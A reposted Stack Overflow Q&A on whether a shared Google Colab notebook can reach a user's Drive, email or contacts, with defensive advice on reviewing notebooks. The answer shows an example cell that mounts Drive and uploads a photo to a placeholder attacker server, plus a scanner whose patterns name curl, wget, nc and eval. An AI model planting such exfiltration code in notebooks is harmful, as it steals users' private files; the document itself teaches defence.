Is Google Colab notebook sharing my Drive data with the notebook author?

I am following an online tutorial, and the tutor has provided a Google Colab notebook as a supplement. However, whenever I run any cell in the notebook, I get the following warning:

Warning: This notebook was not authored by Google. This notebook was authored by [email protected]. It may request access to your data stored with Google such as files, emails and contacts. Please review the source code and contact the creator of this notebook at [email protected] with any additional questions.

(The dialog offers two buttons: Cancel and Run Anyway.)

  1. Does this mean that the author of Colab notebook can access my data such as files, emails, and contacts?

  2. If yes, is there any way to block the author from accessing my data?

  3. The warning message says that it may request access. Does that mean that if/when the notebook wants to access my data, it will ask me for permission via a popup?

  4. The warning message asks me to review the source code. But what exactly should I be looking for in the source code?

I tried googling but didn't get any answer.

Thanks a lot in advance.



Solution 1:[1]

TL;DR: Unless you explicitly allow the notebook to access your Google account, you can safely run it. The exception is a GCE VM, which you may already have authorized to access your data.

  1. Does this mean that the author of Colab notebook can access my data such as files, emails, and contacts?

Depending on the content of the notebook, yes.

Running a harmless snippet like print("hello, world!") does not send any data to the author; after all, Colab is just an environment that runs Jupyter notebooks. However, if a cell contains malicious code instead, an attacker may be able to access your data.

Colab has a set of features that let Python code access the user's data, most notably the contents of their Google Drive. Other APIs expose further information, including your Gmail address and (theoretically) your Contacts. An attacker could use these features to retrieve your data and then send it to their own server with, say, the requests library.

```python
## If the user runs this cell, an image in their Google Drive will be
## sent to the attacker's server. It needs the user's authorization, though.
import requests
from google.colab import drive

drive.mount("/content/drive")  # a popup asking for permission will appear
# Drive contents show up under <mountpoint>/MyDrive
with open("/content/drive/MyDrive/Google Photos/DSC_0001.JPG", "rb") as f:
    # 0.0.0.0 is a placeholder for the attacker's server
    requests.post("https://0.0.0.0/upload/", files={"file": f})
```

  2. If yes, is there any way to block the author from accessing my data?
  3. Warning message says that it may request access. Does it mean that if/when the notebook wants to access the data, it will ask me for the permission via a popup?

When you connect your notebook to a Google-hosted VM (by clicking "Connect" at the top right of the window), the machine is not linked to your Google account. The notebook can access your data only after you take action, either by approving a popup window or by entering an authorization token. For example, when the notebook tries to mount your Google Drive on the VM (with drive.mount()), a popup asks whether you want to allow it.

Therefore, unless you give explicit permission to access data linked to your account, the attacker cannot retrieve it.
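One consequence worth knowing: the popup appears only when Drive is not yet mounted. Once you approve it, the mount stays in place for the rest of the runtime session, so any cell you run afterwards (including cells you have not reviewed) can read your Drive without asking again. A minimal check, assuming Colab's conventional mount point `/content/drive`; the helper `drive_is_mounted` is a hypothetical name, not part of Colab:

```python
import os

def drive_is_mounted(mountpoint: str = "/content/drive") -> bool:
    """Return True if a filesystem is mounted at `mountpoint`.

    Assumption: Drive was mounted at Colab's conventional path /content/drive;
    pass another path if the notebook mounted it elsewhere.
    """
    return os.path.ismount(mountpoint)

if __name__ == "__main__":
    if drive_is_mounted():
        print("Drive is mounted: every cell you run from now on can read it.")
    else:
        print("Drive is not mounted in this runtime.")
```

If it reports a mount you no longer need, Colab's `drive.flush_and_unmount()` detaches it before you run untrusted cells.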

By the way, connecting to a GCE VM is a different story. Depending on how you set up the machine, you might already be logged in to your Google account on the VM. In that case you must be very cautious, since running a single malicious cell is enough to compromise your information.
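Before running untrusted cells on your own VM, it can help to check whether credentials are already sitting on it. The sketch below looks in two well-known places only: the `GOOGLE_APPLICATION_CREDENTIALS` environment variable and the Application Default Credentials file that `gcloud auth application-default login` writes on Linux/macOS. It is a starting point under those assumptions, not an audit: it does not detect a `gcloud auth login` session (check that with `gcloud auth list`) or the service account a GCE VM exposes through its metadata server. The function name is hypothetical.

```python
import os
from pathlib import Path
from typing import List, Optional

def find_local_google_credentials(home: Optional[str] = None) -> List[str]:
    """Return paths of Google credential files that code on this machine could load.

    Only two well-known locations are checked (an assumption, not an exhaustive audit).
    """
    found = []
    # 1. Credential file configured explicitly through the environment
    env_path = os.environ.get("GOOGLE_APPLICATION_CREDENTIALS")
    if env_path and Path(env_path).is_file():
        found.append(env_path)
    # 2. File created by `gcloud auth application-default login` (Linux/macOS layout)
    base = Path(home) if home is not None else Path.home()
    adc = base / ".config" / "gcloud" / "application_default_credentials.json"
    if adc.is_file():
        found.append(str(adc))
    return found

if __name__ == "__main__":
    hits = find_local_google_credentials()
    print(hits if hits else "No credential files found in the checked locations.")
```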

  4. Warning message asks me to review the source code. But what exactly should I be looking for, in the source code?
     1. If a cell contains code that asks you to log in to your Google account (such as drive.mount()), proceed with caution.
     2. If you do need to grant some level of access, the standard security checklist applies: consider whether the author is trustworthy, and examine the notebook thoroughly for any code that retrieves your data and sends it to external servers. If the code is complex, this may not be obvious (and if I were the attacker, I would not put it somewhere easy to find).
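To make that review a little less manual, here is a rough heuristic scanner for a downloaded `.ipynb` file. The helper `scan_notebook` and its pattern list are our own assumptions, not an official checklist. It only flags cells worth reading closely (Drive mounts, Google auth calls, HTTP clients, shell network tools, dynamic code execution); as noted above, a deliberately hidden or obfuscated payload can slip past every pattern, so a clean result does not prove a notebook is safe.

```python
import json
import re
import sys

# Heuristic patterns worth a closer look (our assumption, not an official list).
SUSPICIOUS = {
    "mounts Google Drive": re.compile(r"drive\.mount\("),
    "requests Google auth": re.compile(r"auth\.authenticate_user\(|google\.auth"),
    "HTTP upload/download": re.compile(r"\brequests\.(post|put|get)\(|urllib|http\.client"),
    "shell network tool": re.compile(r"^\s*!\s*(curl|wget|scp|nc)\b", re.M),
    "dynamic code execution": re.compile(r"\b(exec|eval)\(|base64\.b64decode"),
}

def scan_notebook(path):
    """Return (cell_index, reason) pairs for code cells matching a pattern."""
    with open(path, encoding="utf-8") as f:
        nb = json.load(f)
    hits = []
    for i, cell in enumerate(nb.get("cells", [])):
        if cell.get("cell_type") != "code":
            continue  # markdown cells cannot run code
        source = cell.get("source", "")
        # .ipynb stores a cell's source either as one string or as a list of lines
        if isinstance(source, list):
            source = "".join(source)
        for reason, pattern in SUSPICIOUS.items():
            if pattern.search(source):
                hits.append((i, reason))
    return hits

if __name__ == "__main__" and len(sys.argv) > 1:
    for index, reason in scan_notebook(sys.argv[1]):
        print(f"cell {index}: {reason}")
```

Usage: `python scan_notebook.py tutorial.ipynb`, then read every flagged cell by hand.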

Sources

This article follows the attribution requirements of Stack Overflow and is licensed under CC BY-SA 3.0.

Source: Stack Overflow

Solution Source
Solution 1 yumemio